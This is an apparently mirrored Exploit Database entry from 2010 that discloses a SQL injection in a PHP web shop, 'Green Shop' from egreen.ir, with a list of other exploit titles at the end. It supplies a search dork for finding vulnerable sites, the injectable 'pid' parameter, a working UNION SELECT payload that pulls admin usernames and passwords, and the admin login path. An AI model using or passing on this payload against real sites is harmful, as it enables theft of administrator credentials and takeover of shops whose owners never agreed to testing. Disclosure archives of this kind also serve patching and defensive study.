Green Shop – SQL Injection

Exploit Database
10 阅读

作者： PrinceofHacking

日期： 2010-07-07
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/14259/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[x] Tybe: SQL Injection Vulnerabilities
[x] Vendor: egreen.ir
[x] Script Name: Green Shop
[x] author: Ashiyane Digital Security Team
[x] Thanks To N4H
[?] Submit By PrinceofHacking ^_^
[x] Mail : Prince[dot]H4ck@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

D0rk: "egreen.ir"


Exploit:
http://site.org/index.php?pid=[SQLi]

Ex:
http://site.org/index.php?pid=77/**/Union/**/SELECT/**/Group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/admins/**/--

Login Page :
http://site.org/admin/login.php


Special Tnx : All Ashiyane Members

last Exploits
Green Shop – SQL Injection的更多信息

WordPress Plugin Ninja Forms 2.7.7 – Authentication Bypass：
ASPCode CMS 1.5.8 – ‘default.asp’ Multiple Cross-Site Scripting Vulnerabilities：
Joomla! Component JoltCard 1.2.1 – SQL Injection：
Complaint Management System 1.0 – ‘cid’ SQL Injection：
Infinity Market Classified Ads Script 1.6.2 – Cross-Site Request Forgery：
Trend Micro Data Loss Prevention Virtual Appliance 5.5 – Directory Traversal：
HybridAuth 2.2.2 – Remote Code Execution：
Opentel Openmairie tel 1.02 – Local File Inclusion：